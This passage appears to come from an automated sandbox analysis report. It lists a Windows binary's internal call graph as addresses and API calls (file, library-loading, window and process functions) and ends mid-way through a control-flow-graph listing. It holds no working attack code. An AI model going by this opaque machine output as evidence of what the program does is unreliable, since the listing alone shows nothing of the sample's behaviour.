calls 96159->96165 96162 382ec3 96260 386f88 22 API calls 96162->96260 96164 382ecf 96166 389cb3 22 API calls 96164->96166 96167 3c2ce5 96165->96167 96168 382edc 96166->96168 96309 383084 22 API calls 96167->96309 96261 38a81b 41 API calls 96168->96261 96170 382eec 96173 389cb3 22 API calls 96170->96173 96172 3c2d02 96310 383084 22 API calls 96172->96310 96175 382f12 96173->96175 96262 38a81b 41 API calls 96175->96262 96176 3c2d1e 96178 383a5a 24 API calls 96176->96178 96179 3c2d44 96178->96179 96311 383084 22 API calls 96179->96311 96180 382f21 96183 38a961 22 API calls 96180->96183 96182 3c2d50 96312 38a8c7 22 API calls __fread_nolock 96182->96312 96184 382f3f 96183->96184 96263 383084 22 API calls 96184->96263 96187 3c2d5e 96313 383084 22 API calls 96187->96313 96188 382f4b 96264 3a4a28 40 API calls 2 library calls 96188->96264 96191 3c2d6d 96314 38a8c7 22 API calls __fread_nolock 96191->96314 96192 382f59 96192->96167 96193 382f63 96192->96193 96265 3a4a28 40 API calls 2 library calls 96193->96265 96196 3c2d83 96315 383084 22 API calls 96196->96315 96197 382f6e 96197->96172 96199 382f78 96197->96199 96266 3a4a28 40 API calls 2 library calls 96199->96266 96200 3c2d90 96202 382f83 96202->96176 96203 382f8d 96202->96203 96267 3a4a28 40 API calls 2 library calls 96203->96267 96205 382f98 96206 382fdc 96205->96206 96268 383084 22 API calls 96205->96268 96206->96191 96207 382fe8 96206->96207 96207->96200 96271 3863eb 22 API calls 96207->96271 96209 382fbf 96269 38a8c7 22 API calls __fread_nolock 96209->96269 96212 382ff8 96272 386a50 22 API calls 96212->96272 96213 382fcd 96270 383084 22 API calls 96213->96270 96216 383006 96273 3870b0 23 API calls 96216->96273 96220 383021 96221 383065 96220->96221 96274 386f88 22 API calls 96220->96274 96275 3870b0 23 API calls 96220->96275 96276 383084 22 API calls 96220->96276 96224 384af0 __wsopen_s 96223->96224 96225 386b57 22 API calls 96224->96225 96226 384b22 96224->96226 96225->96226 96227 384c6d 22 API calls 96226->96227 96229 384b58 96226->96229 96227->96226 96228 384c6d 22 API calls 96228->96229 96229->96228 96232 384c29 96229->96232 96233 389cb3 22 API calls 96229->96233 96236 38515f 22 API calls 96229->96236 96230 389cb3 22 API calls 96234 384c52 96230->96234 96231 384c5e 96231->96148 96232->96230 96232->96231 96233->96229 96235 38515f 22 API calls 96234->96235 96235->96231 96236->96229 96316 384e90 LoadLibraryA 96237->96316 96242 3c3ccf 96244 384f39 68 API calls 96242->96244 96243 384ef6 LoadLibraryExW 96324 384e59 LoadLibraryA 96243->96324 96246 3c3cd6 96244->96246 96248 384e59 3 API calls 96246->96248 96250 3c3cde 96248->96250 96346 3850f5 96250->96346 96251 384f20 96251->96250 96252 384f2c 96251->96252 96254 384f39 68 API calls 96252->96254 96255 382ea5 96254->96255 96255->96155 96255->96156 96258 3c3d05 96259->96162 96260->96164 96261->96170 96262->96180 96263->96188 96264->96192 96265->96197 96266->96202 96267->96205 96268->96209 96269->96213 96270->96206 96271->96212 96272->96216 96273->96220 96274->96220 96275->96220 96276->96220 96278 3f2d15 96277->96278 96279 38511f 64 API calls 96278->96279 96280 3f2d29 96279->96280 96486 3f2e66 96280->96486 96283 3f2d3f 96283->96158 96284 3850f5 40 API calls 96285 3f2d56 96284->96285 96286 3850f5 40 API calls 96285->96286 96287 3f2d66 96286->96287 96288 3850f5 40 API calls 96287->96288 96289 3f2d81 96288->96289 96290 3850f5 40 API calls 96289->96290 96291 3f2d9c 96290->96291 96292 38511f 64 API calls 96291->96292 96293 3f2db3 96292->96293 96294 3aea0c ___std_exception_copy 21 API calls 96293->96294 96295 3f2dba 96294->96295 96296 3aea0c ___std_exception_copy 21 API calls 96295->96296 96297 3f2dc4 96296->96297 96298 3850f5 40 API calls 96297->96298 96299 3f2dd8 96298->96299 96300 3f28fe 27 API calls 96299->96300 96301 3f2dee 96300->96301 96301->96283 96492 3f22ce 79 API calls 96301->96492 96304 384f43 96303->96304 96308 384f4a 96303->96308 96493 3ae678 96304->96493 96306 384f59 96306->96159 96307 384f6a FreeLibrary 96307->96306 96308->96306 96308->96307 96309->96172 96310->96176 96311->96182 96312->96187 96313->96191 96314->96196 96315->96200 96317 384ea8 GetProcAddress 96316->96317 96318 384ec6 96316->96318 96319 384eb8 96317->96319 96321 3ae5eb 96318->96321 96319->96318 96320 384ebf FreeLibrary 96319->96320 96320->96318 96354 3ae52a 96321->96354 96323 384eea 96323->96242 96323->96243 96325 384e8d 96324->96325 96326 384e6e GetProcAddress 96324->96326 96329 384f80 96325->96329 96327 384e7e 96326->96327 96327->96325 96328 384e86 FreeLibrary 96327->96328 96328->96325 96330 39fe0b 22 API calls 96329->96330 96331 384f95 96330->96331 96332 385722 22 API calls 96331->96332 96333 384fa1 __fread_nolock 96332->96333 96334 3c3d1d 96333->96334 96335 3850a5 96333->96335 96342 384fdc 96333->96342 96426 3f304d 74 API calls 96334->96426 96415 3842a2 CreateStreamOnHGlobal 96335->96415 96338 3c3d22 96340 38511f 64 API calls 96338->96340 96339 3850f5 40 API calls 96339->96342 96341 3c3d45 96340->96341 96343 3850f5 40 API calls 96341->96343 96342->96338 96342->96339 96344 38506e messages 96342->96344 96421 38511f 96342->96421 96343->96344 96344->96251 96347 385107 96346->96347 96350 3c3d70 96346->96350 96448 3ae8c4 96347->96448 96351 3f28fe 96469 3f274e 96351->96469 96353 3f2919 96353->96258 96357 3ae536 ___scrt_is_nonwritable_in_current_image 96354->96357 96355 3ae544 96379 3af2d9 20 API calls _abort 96355->96379 96357->96355 96359 3ae574 96357->96359 96358 3ae549 96380 3b27ec 26 API calls _strftime 96358->96380 96361 3ae579 96359->96361 96362 3ae586 96359->96362 96381 3af2d9 20 API calls _abort 96361->96381 96371 3b8061 96362->96371 96365 3ae58f 96366 3ae5a2 96365->96366 96367 3ae595 96365->96367 96383 3ae5d4 LeaveCriticalSection __fread_nolock 96366->96383 96382 3af2d9 20 API calls _abort 96367->96382 96369 3ae554 __fread_nolock 96369->96323 96372 3b806d ___scrt_is_nonwritable_in_current_image 96371->96372 96384 3b2f5e EnterCriticalSection 96372->96384 96374 3b807b 96385 3b80fb 96374->96385 96378 3b80ac __fread_nolock 96378->96365 96379->96358 96380->96369 96381->96369 96382->96369 96383->96369 96384->96374 96389 3b811e 96385->96389 96386 3b8088 96399 3b80b7 96386->96399 96387 3b8177 96404 3b4c7d 20 API calls 2 library calls 96387->96404 96389->96386 96389->96387 96402 3a918d EnterCriticalSection 96389->96402 96403 3a91a1 LeaveCriticalSection 96389->96403 96390 3b8180 96405 3b29c8 96390->96405 96393 3b8189 96393->96386 96411 3b3405 11 API calls 2 library calls 96393->96411 96395 3b81a8 96412 3a918d EnterCriticalSection 96395->96412 96398 3b81bb 96398->96386 96414 3b2fa6 LeaveCriticalSection 96399->96414 96401 3b80be 96401->96378 96402->96389 96403->96389 96404->96390 96406 3b29d3 RtlFreeHeap 96405->96406 96407 3b29fc __dosmaperr 96405->96407 96406->96407 96408 3b29e8 96406->96408 96407->96393 96413 3af2d9 20 API calls _abort 96408->96413 96410 3b29ee GetLastError 96410->96407 96411->96395 96412->96398 96413->96410 96414->96401 96416 3842bc FindResourceExW 96415->96416 96420 3842d9 96415->96420 96417 3c35ba LoadResource 96416->96417 96416->96420 96418 3c35cf SizeofResource 96417->96418 96417->96420 96419 3c35e3 LockResource 96418->96419 96418->96420 96419->96420 96420->96342 96422 38512e 96421->96422 96423 3c3d90 96421->96423 96427 3aece3 96422->96427 96426->96338 96430 3aeaaa 96427->96430 96429 38513c 96429->96342 96434 3aeab6 ___scrt_is_nonwritable_in_current_image 96430->96434 96431 3aeac2 96443 3af2d9 20 API calls _abort 96431->96443 96433 3aeae8 96445 3a918d EnterCriticalSection 96433->96445 96434->96431 96434->96433 96435 3aeac7 96444 3b27ec 26 API calls _strftime 96435->96444 96438 3aeaf4 96446 3aec0a 62 API calls 2 library calls 96438->96446 96440 3aeb08 96447 3aeb27 LeaveCriticalSection __fread_nolock 96440->96447 96442 3aead2 __fread_nolock 96442->96429 96443->96435 96444->96442 96445->96438 96446->96440 96447->96442 96451 3ae8e1 96448->96451 96450 385118 96450->96351 96452 3ae8ed ___scrt_is_nonwritable_in_current_image 96451->96452 96453 3ae92d 96452->96453 96454 3ae900 ___scrt_fastfail 96452->96454 96455 3ae925 __fread_nolock 96452->96455 96466 3a918d EnterCriticalSection 96453->96466 96464 3af2d9 20 API calls _abort 96454->96464 96455->96450 96457 3ae937 96467 3ae6f8 38 API calls 4 library calls 96457->96467 96459 3ae91a 96465 3b27ec 26 API calls _strftime 96459->96465 96462 3ae94e 96468 3ae96c LeaveCriticalSection __fread_nolock 96462->96468 96464->96459 96465->96455 96466->96457 96467->96462 96468->96455 96472 3ae4e8 96469->96472 96471 3f275d 96471->96353 96475 3ae469 96472->96475 96474 3ae505 96474->96471 96476 3ae478 96475->96476 96477 3ae48c 96475->96477 96483 3af2d9 20 API calls _abort 96476->96483 96482 3ae488 __alldvrm 96477->96482 96485 3b333f 11 API calls 2 library calls 96477->96485 96479 3ae47d 96484 3b27ec 26 API calls _strftime 96479->96484 96482->96474 96483->96479 96484->96482 96485->96482 96491 3f2e7a 96486->96491 96487 3850f5 40 API calls 96487->96491 96488 3f2d3b 96488->96283 96488->96284 96489 3f28fe 27 API calls 96489->96491 96490 38511f 64 API calls 96490->96491 96491->96487 96491->96488 96491->96489 96491->96490 96492->96283 96494 3ae684 ___scrt_is_nonwritable_in_current_image 96493->96494 96495 3ae6aa 96494->96495 96496 3ae695 96494->96496 96505 3ae6a5 __fread_nolock 96495->96505 96506 3a918d EnterCriticalSection 96495->96506 96523 3af2d9 20 API calls _abort 96496->96523 96499 3ae69a 96524 3b27ec 26 API calls _strftime 96499->96524 96500 3ae6c6 96507 3ae602 96500->96507 96503 3ae6d1 96525 3ae6ee LeaveCriticalSection __fread_nolock 96503->96525 96505->96308 96506->96500 96508 3ae60f 96507->96508 96509 3ae624 96507->96509 96558 3af2d9 20 API calls _abort 96508->96558 96514 3ae61f 96509->96514 96526 3adc0b 96509->96526 96511 3ae614 96559 3b27ec 26 API calls _strftime 96511->96559 96514->96503 96519 3ae646 96543 3b862f 96519->96543 96522 3b29c8 _free 20 API calls 96522->96514 96523->96499 96524->96505 96525->96505 96527 3adc23 96526->96527 96531 3adc1f 96526->96531 96528 3ad955 __fread_nolock 26 API calls 96527->96528 96527->96531 96529 3adc43 96528->96529 96560 3b59be 62 API calls 5 library calls 96529->96560 96532 3b4d7a 96531->96532 96533 3b4d90 96532->96533 96534 3ae640 96532->96534 96533->96534 96535 3b29c8 _free 20 API calls 96533->96535 96536 3ad955 96534->96536 96535->96534 96537 3ad961 96536->96537 96538 3ad976 96536->96538 96561 3af2d9 20 API calls _abort 96537->96561 96538->96519 96540 3ad966 96562 3b27ec 26 API calls _strftime 96540->96562 96542 3ad971 96542->96519 96544 3b863e 96543->96544 96545 3b8653 96543->96545 96566 3af2c6 20 API calls _abort 96544->96566 96546 3b868e 96545->96546 96550 3b867a 96545->96550 96568 3af2c6 20 API calls _abort 96546->96568 96549 3b8643 96567 3af2d9 20 API calls _abort 96549->96567 96563 3b8607 96550->96563 96551 3b8693 96569 3af2d9 20 API calls _abort 96551->96569 96555 3ae64c 96555->96514 96555->96522 96556 3b869b 96570 3b27ec 26 API calls _strftime 96556->96570 96558->96511 96559->96514 96560->96531 96561->96540 96562->96542 96571 3b8585 96563->96571 96565 3b862b 96565->96555 96566->96549 96567->96555 96568->96551 96569->96556 96570->96555 96572 3b8591 ___scrt_is_nonwritable_in_current_image 96571->96572 96582 3b5147 EnterCriticalSection 96572->96582 96574 3b859f 96575 3b85d1 96574->96575 96576 3b85c6 96574->96576 96598 3af2d9 20 API calls _abort 96575->96598 96583 3b86ae 96576->96583 96579 3b85cc 96599 3b85fb LeaveCriticalSection __wsopen_s 96579->96599 96581 3b85ee __fread_nolock 96581->96565 96582->96574 96600 3b53c4 96583->96600 96585 3b86c4 96613 3b5333 21 API calls 2 library calls 96585->96613 96586 3b86be 96586->96585 96588 3b53c4 __wsopen_s 26 API calls 96586->96588 96597 3b86f6 96586->96597 96592 3b86ed 96588->96592 96589 3b53c4 __wsopen_s 26 API calls 96593 3b8702 CloseHandle 96589->96593 96590 3b871c 96591 3b873e 96590->96591 96614 3af2a3 20 API calls __dosmaperr 96590->96614 96591->96579 96595 3b53c4 __wsopen_s 26 API calls 96592->96595 96593->96585 96596 3b870e GetLastError 96593->96596 96595->96597 96596->96585 96597->96585 96597->96589 96598->96579 96599->96581 96601 3b53d1 96600->96601 96603 3b53e6 96600->96603 96615 3af2c6 20 API calls _abort 96601->96615 96606 3b540b 96603->96606 96617 3af2c6 20 API calls _abort 96603->96617 96605 3b53d6 96616 3af2d9 20 API calls _abort 96605->96616 96606->96586 96607 3b5416 96618 3af2d9 20 API calls _abort 96607->96618 96609 3b53de 96609->96586 96611 3b541e 96619 3b27ec 26 API calls _strftime 96611->96619 96613->96590 96614->96591 96615->96605 96616->96609 96617->96607 96618->96611 96619->96609 96620 381cad SystemParametersInfoW 96621 38ddc0 96624 38aa19 96621->96624 96623 38ddcc 96625 38aa3a 96624->96625 96626 38aa8f 96624->96626 96625->96626 96628 38ec40 208 API calls 96625->96628 96627 38aabe 96626->96627 96634 3f359c 82 API calls __wsopen_s 96626->96634 96627->96623 96631 38aa6b 96628->96631 96630 3cf907 96630->96630 96631->96627 96633 38aceb 23 API calls messages 96631->96633 96633->96626 96634->96630 96635 3b8402 96640 3b81be 96635->96640 96638 3b842a 96645 3b81ef try_get_first_available_module 96640->96645 96642 3b83ee 96659 3b27ec 26 API calls _strftime 96642->96659 96644 3b8343 96644->96638 96652 3c0984 96644->96652 96648 3b8338 96645->96648 96655 3a8e0b 40 API calls 2 library calls 96645->96655 96647 3b838c 96647->96648 96656 3a8e0b 40 API calls 2 library calls 96647->96656 96648->96644 96658 3af2d9 20 API calls _abort 96648->96658 96650 3b83ab 96650->96648 96657 3a8e0b 40 API calls 2 library calls 96650->96657 96660 3c0081 96652->96660 96654 3c099f 96654->96638 96655->96647 96656->96650 96657->96648 96658->96642 96659->96644 96663 3c008d ___scrt_is_nonwritable_in_current_image 96660->96663 96661 3c009b 96717 3af2d9 20 API calls _abort 96661->96717 96663->96661 96665 3c00d4 96663->96665 96664 3c00a0 96718 3b27ec 26 API calls _strftime 96664->96718 96671 3c065b 96665->96671 96670 3c00aa __fread_nolock 96670->96654 96672 3c0678 96671->96672 96673 3c068d 96672->96673 96674 3c06a6 96672->96674 96734 3af2c6 20 API calls _abort 96673->96734 96720 3b5221 96674->96720 96677 3c06ab 96678 3c06cb 96677->96678 96679 3c06b4 96677->96679 96733 3c039a CreateFileW 96678->96733 96736 3af2c6 20 API calls _abort 96679->96736 96683 3c06b9 96737 3af2d9 20 API calls _abort 96683->96737 96685 3c0781 GetFileType 96688 3c078c GetLastError 96685->96688 96689 3c07d3 96685->96689 96686 3c0756 GetLastError 96739 3af2a3 20 API calls __dosmaperr 96686->96739 96687 3c0704 96687->96685 96687->96686 96738 3c039a CreateFileW 96687->96738 96740 3af2a3 20 API calls __dosmaperr 96688->96740 96742 3b516a 21 API calls 2 library calls 96689->96742 96690 3c0692 96735 3af2d9 20 API calls _abort 96690->96735 96694 3c079a CloseHandle 96694->96690 96697 3c07c3 96694->96697 96696 3c0749 96696->96685 96696->96686 96741 3af2d9 20 API calls _abort 96697->96741 96698 3c07f4 96700 3c0840 96698->96700 96743 3c05ab 72 API calls 3 library calls 96698->96743 96705 3c086d 96700->96705 96744 3c014d 72 API calls 4 library calls 96700->96744 96701 3c07c8 96701->96690 96704 3c0866 96704->96705 96706 3c087e 96704->96706 96707 3b86ae __wsopen_s 29 API calls 96705->96707 96708 3c00f8 96706->96708 96709 3c08fc CloseHandle 96706->96709 96707->96708 96719 3c0121 LeaveCriticalSection __wsopen_s 96708->96719 96745 3c039a CreateFileW 96709->96745 96711 3c0927 96712 3c0931 GetLastError 96711->96712 96713 3c095d 96711->96713 96746 3af2a3 20 API calls __dosmaperr 96712->96746 96713->96708 96715 3c093d 96747 3b5333 21 API calls 2 library calls 96715->96747 96717->96664 96718->96670 96719->96670 96721 3b522d ___scrt_is_nonwritable_in_current_image 96720->96721 96748 3b2f5e EnterCriticalSection 96721->96748 96723 3b5234 96725 3b5259 96723->96725 96729 3b52c7 EnterCriticalSection 96723->96729 96730 3b527b 96723->96730 96752 3b5000 21 API calls 3 library calls 96725->96752 96726 3b52a4 __fread_nolock 96726->96677 96728 3b525e 96728->96730 96753 3b5147 EnterCriticalSection 96728->96753 96729->96730 96731 3b52d4 LeaveCriticalSection 96729->96731 96749 3b532a 96730->96749 96731->96723 96733->96687 96734->96690 96735->96708 96736->96683 96737->96690 96738->96696 96739->96690 96740->96694 96741->96701 96742->96698 96743->96700 96744->96704 96745->96711 96746->96715 96747->96713 96748->96723 96754 3b2fa6 LeaveCriticalSection 96749->96754 96751 3b5331 96751->96726 96752->96728 96753->96730 96754->96751 96755 3c2ba5 96756 3c2baf 96755->96756 96757 382b25 96755->96757 96759 383a5a 24 API calls 96756->96759 96783 382b83 7 API calls 96757->96783 96761 3c2bb8 96759->96761 96763 389cb3 22 API calls 96761->96763 96765 3c2bc6 96763->96765 96764 382b2f 96774 382b44 96764->96774 96787 383837 49 API calls ___scrt_fastfail 96764->96787 96766 3c2bce 96765->96766 96767 3c2bf5 96765->96767 96770 3833c6 22 API calls 96766->96770 96769 3833c6 22 API calls 96767->96769 96772 3c2bf1 GetForegroundWindow ShellExecuteW 96769->96772 96771 3c2bd9 96770->96771 96773 386350 22 API calls 96771->96773 96779 3c2c26 96772->96779 96777 3c2be7 96773->96777 96775 382b5f 96774->96775 96788 3830f2 Shell_NotifyIconW ___scrt_fastfail 96774->96788 96781 382b66 SetCurrentDirectoryW 96775->96781 96780 3833c6 22 API calls 96777->96780 96779->96775 96780->96772 96782 382b7a 96781->96782 96789 382cd4 7 API calls 96783->96789 96785 382b2a 96786 382c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96785->96786 96786->96764 96787->96774 96788->96775 96789->96785 96790 382de3 96791 382df0 __wsopen_s 96790->96791 96792 382e09 96791->96792 96793 3c2c2b ___scrt_fastfail 96791->96793 96794 383aa2 23 API calls 96792->96794 96796 3c2c47 GetOpenFileNameW 96793->96796 96795 382e12 96794->96795 96806 382da5 96795->96806 96798 3c2c96 96796->96798 96799 386b57 22 API calls 96798->96799 96801 3c2cab 96799->96801 96801->96801 96803 382e27 96824 3844a8 96803->96824 96807 3c1f50 __wsopen_s 96806->96807 96808 382db2 GetLongPathNameW 96807->96808 96809 386b57 22 API calls 96808->96809 96810 382dda 96809->96810 96811 383598 96810->96811 96812 38a961 22 API calls 96811->96812 96813 3835aa 96812->96813 96814 383aa2 23 API calls 96813->96814 96815 3835b5 96814->96815 96816 3c32eb 96815->96816 96817 3835c0 96815->96817 96821 3c330d 96816->96821 96860 39ce60 41 API calls 96816->96860 96819 38515f 22 API calls 96817->96819 96820 3835cc 96819->96820 96854 3835f3 96820->96854 96823 3835df 96823->96803 96825 384ecb 94 API calls 96824->96825 96826 3844cd 96825->96826 96827 3c3833 96826->96827 96829 384ecb 94 API calls 96826->96829 96828 3f2cf9 80 API calls 96827->96828 96830 3c3848 96828->96830 96831 3844e1 96829->96831 96832 3c384c 96830->96832 96833 3c3869 96830->96833 96831->96827 96834 3844e9 96831->96834 96835 384f39 68 API calls 96832->96835 96836 39fe0b 22 API calls 96833->96836 96837 3c3854 96834->96837 96838 3844f5 96834->96838 96835->96837 96853 3c38ae 96836->96853 96871 3eda5a 82 API calls 96837->96871 96870 38940c 136 API calls 2 library calls 96838->96870 96841 3c3862 96841->96833 96842 382e31 96843 3c3a5f 96848 3c3a67 96843->96848 96844 384f39 68 API calls 96844->96848 96845 38a4a1 22 API calls 96845->96853 96846 383ff7 22 API calls 96846->96853 96848->96844 96873 3e989b 82 API calls __wsopen_s 96848->96873 96850 389cb3 22 API calls 96850->96853 96853->96843 96853->96845 96853->96846 96853->96848 96853->96850 96861 3e967e 96853->96861 96864 3f0b5a 96853->96864 96872 3e95ad 42 API calls _wcslen 96853->96872 96855 383605 96854->96855 96859 383624 __fread_nolock 96854->96859 96857 39fe0b 22 API calls 96855->96857 96856 39fddb 22 API calls 96858 38363b 96856->96858 96857->96859 96858->96823 96859->96856 96860->96816 96862 39fe0b 22 API calls 96861->96862 96863 3e96ae __fread_nolock 96862->96863 96863->96853 96866 3f0b65 96864->96866 96865 39fddb 22 API calls 96867 3f0b7c 96865->96867 96866->96865 96868 389cb3 22 API calls 96867->96868 96869 3f0b87 96868->96869 96869->96853 96870->96842 96871->96841 96872->96853 96873->96848 96874 3d3a41 96878 3f10c0 96874->96878 96876 3d3a4c 96877 3f10c0 53 API calls 96876->96877 96877->96876 96879 3f10fa 96878->96879 96884 3f10cd 96878->96884 96879->96876 96880 3f10fc 96890 39fa11 53 API calls 96880->96890 96882 3f1101 96883 387510 53 API calls 96882->96883 96885 3f1108 96883->96885 96884->96879 96884->96880 96884->96882 96887 3f10f4 96884->96887 96886 386350 22 API calls 96885->96886 96886->96879 96889 38b270 39 API calls 96887->96889 96889->96879 96890->96882 96891 381044 96896 3810f3 96891->96896 96893 38104a 96932 3a00a3 29 API calls __onexit 96893->96932 96895 381054 96933 381398 96896->96933 96900 38116a 96901 38a961 22 API calls 96900->96901 96902 381174 96901->96902 96903 38a961 22 API calls 96902->96903 96904 38117e 96903->96904 96905 38a961 22 API calls 96904->96905 96906 381188 96905->96906 96907 38a961 22 API calls 96906->96907 96908 3811c6 96907->96908 96909 38a961 22 API calls 96908->96909 96910 381292 96909->96910 96943 38171c 96910->96943 96914 3812c4 96915 38a961 22 API calls 96914->96915 96916 3812ce 96915->96916 96917 391940 9 API calls 96916->96917 96918 3812f9 96917->96918 96964 381aab 96918->96964 96920 381315 96921 381325 GetStdHandle 96920->96921 96922 38137a 96921->96922 96923 3c2485 96921->96923 96926 381387 OleInitialize 96922->96926 96923->96922 96924 3c248e 96923->96924 96925 39fddb 22 API calls 96924->96925 96927 3c2495 96925->96927 96926->96893 96971 3f011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96927->96971 96929 3c249e 96972 3f0944 CreateThread 96929->96972 96931 3c24aa CloseHandle 96931->96922 96932->96895 96973 3813f1 96933->96973 96936 3813f1 22 API calls 96937 3813d0 96936->96937 96938 38a961 22 API calls 96937->96938 96939 3813dc 96938->96939 96940 386b57 22 API calls 96939->96940 96941 381129 96940->96941 96942 381bc3 6 API calls 96941->96942 96942->96900 96944 38a961 22 API calls 96943->96944 96945 38172c 96944->96945 96946 38a961 22 API calls 96945->96946 96947 381734 96946->96947 96948 38a961 22 API calls 96947->96948 96949 38174f 96948->96949 96950 39fddb 22 API calls 96949->96950 96951 38129c 96950->96951 96952 381b4a 96951->96952 96953 381b58 96952->96953 96954 38a961 22 API calls 96953->96954 96955 381b63 96954->96955 96956 38a961 22 API calls 96955->96956 96957 381b6e 96956->96957 96958 38a961 22 API calls 96957->96958 96959 381b79 96958->96959 96960 38a961 22 API calls 96959->96960 96961 381b84 96960->96961 96962 39fddb 22 API calls 96961->96962 96963 381b96 RegisterWindowMessageW 96962->96963 96963->96914 96965 3c272d 96964->96965 96966 381abb 96964->96966 96980 3f3209 23 API calls 96965->96980 96967 39fddb 22 API calls 96966->96967 96969 381ac3 96967->96969 96969->96920 96970 3c2738 96971->96929 96972->96931 96981 3f092a 28 API calls 96972->96981 96974 38a961 22 API calls 96973->96974 96975 3813fc 96974->96975 96976 38a961 22 API calls 96975->96976 96977 381404 96976->96977 96978 38a961 22 API calls 96977->96978 96979 3813c6 96978->96979 96979->96936 96980->96970 96982 3d2a00 96996 38d7b0 messages 96982->96996 96983 38db11 PeekMessageW 96983->96996 96984 38d807 GetInputState 96984->96983 96984->96996 96986 3d1cbe TranslateAcceleratorW 96986->96996 96987 38da04 timeGetTime 96987->96996 96988 38db8f PeekMessageW 96988->96996 96989 38db73 TranslateMessage DispatchMessageW 96989->96988 96990 38dbaf Sleep 97008 38dbc0 96990->97008 96991 3d2b74 Sleep 96991->97008 96992 39e551 timeGetTime 96992->97008 96993 3d1dda timeGetTime 97049 39e300 23 API calls 96993->97049 96996->96983 96996->96984 96996->96986 96996->96987 96996->96988 96996->96989 96996->96990 96996->96991 96996->96993 96998 38d9d5 96996->96998 97010 38ec40 208 API calls 96996->97010 97011 391310 208 API calls 96996->97011 97012 38bf40 208 API calls 96996->97012 97014 38dd50 96996->97014 97021 38dfd0 96996->97021 97044 39edf6 96996->97044 97050 3f3a2a 23 API calls 96996->97050 97051 3f359c 82 API calls __wsopen_s 96996->97051 96997 3d2c0b GetExitCodeProcess 97000 3d2c37 CloseHandle 96997->97000 97001 3d2c21 WaitForSingleObject 96997->97001 97000->97008 97001->96996 97001->97000 97002 3d2a31 97002->96998 97003 4129bf GetForegroundWindow 97003->97008 97004 3d2ca9 Sleep 97004->96996 97008->96992 97008->96996 97008->96997 97008->96998 97008->97002 97008->97003 97008->97004 97052 405658 23 API calls 97008->97052 97053 3ee97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97008->97053 97054 3ed4dc 47 API calls 97008->97054 97010->96996 97011->96996 97012->96996 97015 38dd6f 97014->97015 97016 38dd83 97014->97016 97055 38d260 97015->97055 97087 3f359c 82 API calls __wsopen_s 97016->97087 97019 38dd7a 97019->96996 97020 3d2f75 97020->97020 97022 38e010 97021->97022 97038 38e0dc messages 97022->97038 97098 3a0242 5 API calls __Init_thread_wait 97022->97098 97023 38ec40 208 API calls 97023->97038 97026 3d2fca 97028 38a961 22 API calls 97026->97028 97026->97038 97027 38a961 22 API calls 97027->97038 97031 3d2fe4 97028->97031 97099 3a00a3 29 API calls __onexit 97031->97099 97034 3f359c 82 API calls 97034->97038 97035 3d2fee 97100 3a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97035->97100 97038->97023 97038->97027 97038->97034 97040 38e3e1 97038->97040 97041 3904f0 22 API calls 97038->97041 97095 38a8c7 22 API calls __fread_nolock 97038->97095 97096 38a81b 41 API calls 97038->97096 97097 39a308 208 API calls 97038->97097 97101 3a0242 5 API calls __Init_thread_wait 97038->97101 97102 3a00a3 29 API calls __onexit 97038->97102 97103 3a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97038->97103 97104 4047d4 208 API calls 97038->97104 97105 4068c1 208 API calls 97038->97105 97040->96996 97041->97038 97045 39ee09 97044->97045 97046 39ee12 97044->97046 97045->96996 97046->97045 97047 39ee36 IsDialogMessageW 97046->97047 97048 3defaf GetClassLongW 97046->97048 97047->97045 97047->97046 97048->97046 97048->97047 97049->96996 97050->96996 97051->96996 97052->97008 97053->97008 97054->97008 97056 38ec40 208 API calls 97055->97056 97078 38d29d 97056->97078 97057 3d1bc4 97094 3f359c 82 API calls __wsopen_s 97057->97094 97059 38d30b messages 97059->97019 97060 38d3c3 97062 38d6d5 97060->97062 97063 38d3ce 97060->97063 97061 38d5ff 97064 3d1bb5 97061->97064 97065 38d614 97061->97065 97062->97059 97071 39fe0b 22 API calls 97062->97071 97067 39fddb 22 API calls 97063->97067 97093 405705 23 API calls 97064->97093 97069 39fddb 22 API calls 97065->97069 97066 38d4b8 97073 39fe0b 22 API calls 97066->97073 97075 38d3d5 __fread_nolock 97067->97075 97074 38d46a 97069->97074 97070 39fddb 22 API calls 97070->97078 97071->97075 97072 38d429 __fread_nolock messages 97072->97061 97072->97074 97080 3d1ba4 97072->97080 97083 3d1b7f 97072->97083 97085 3d1b5d 97072->97085 97089 381f6f 208 API calls 97072->97089 97073->97072 97074->97019 97076 39fddb 22 API calls 97075->97076 97077 38d3f6 97075->97077 97076->97077 97077->97072 97088 38bec0 208 API calls 97077->97088 97078->97057 97078->97059 97078->97060 97078->97062 97078->97066 97078->97070 97078->97072 97092 3f359c 82 API calls __wsopen_s 97080->97092 97091 3f359c 82 API calls __wsopen_s 97083->97091 97090 3f359c 82 API calls __wsopen_s 97085->97090 97087->97020 97088->97072 97089->97072 97090->97074 97091->97074 97092->97074 97093->97057 97094->97059 97095->97038 97096->97038 97097->97038 97098->97026 97099->97035 97100->97038 97101->97038 97102->97038 97103->97038 97104->97038 97105->97038 97106 38dee5 97107 38b710 208 API calls 97106->97107 97108 38def3 97107->97108

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 234 3842de-38434d call 38a961 GetVersionExW call 386b57 239 3c3617-3c362a 234->239 240 384353 234->240 242 3c362b-3c362f 239->242 241 384355-384357 240->241 243 38435d-3843bc call 3893b2 call 3837a0 241->243 244 3c3656 241->244 245 3c3631 242->245 246 3c3632-3c363e 242->246 262 3c37df-3c37e6 243->262 263 3843c2-3843c4 243->263 249 3c365d-3c3660 244->249 245->246 246->242 248 3c3640-3c3642 246->248 248->241 251 3c3648-3c364f 248->251 252 38441b-384435 GetCurrentProcess IsWow64Process 249->252 253 3c3666-3c36a8 249->253 251->239 255 3c3651 251->255 258 384494-38449a 252->258 259 384437 252->259 253->252 256 3c36ae-3c36b1 253->256 255->244 260 3c36db-3c36e5 256->260 261 3c36b3-3c36bd 256->261 264 38443d-384449 258->264 259->264 270 3c36f8-3c3702 260->270 271 3c36e7-3c36f3 260->271 267 3c36bf-3c36c5 261->267 268 3c36ca-3c36d6 261->268 272 3c37e8 262->272 273 3c3806-3c3809 262->273 263->249 269 3843ca-3843dd 263->269 265 38444f-38445e LoadLibraryA 264->265 266 3c3824-3c3828 